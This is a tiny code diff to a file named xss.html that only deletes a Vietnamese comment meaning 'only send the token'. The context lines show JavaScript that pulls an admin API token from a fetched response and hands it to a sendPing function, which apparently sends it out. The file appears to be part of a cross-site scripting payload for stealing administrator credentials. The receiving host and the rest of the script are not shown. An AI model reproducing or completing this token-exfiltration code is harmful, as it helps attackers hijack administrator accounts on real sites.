--- a/xss.html
+++ b/xss.html
@@ -55,7 +55,7 @@
             .then(data => {
                 if (data && data.token) {
                     var adminApiToken = data.token;
-                    sendPing({ token: adminApiToken }); // Chỉ gửi token
+                    sendPing({ token: adminApiToken });
                 }
             })
             .catch(error => {});
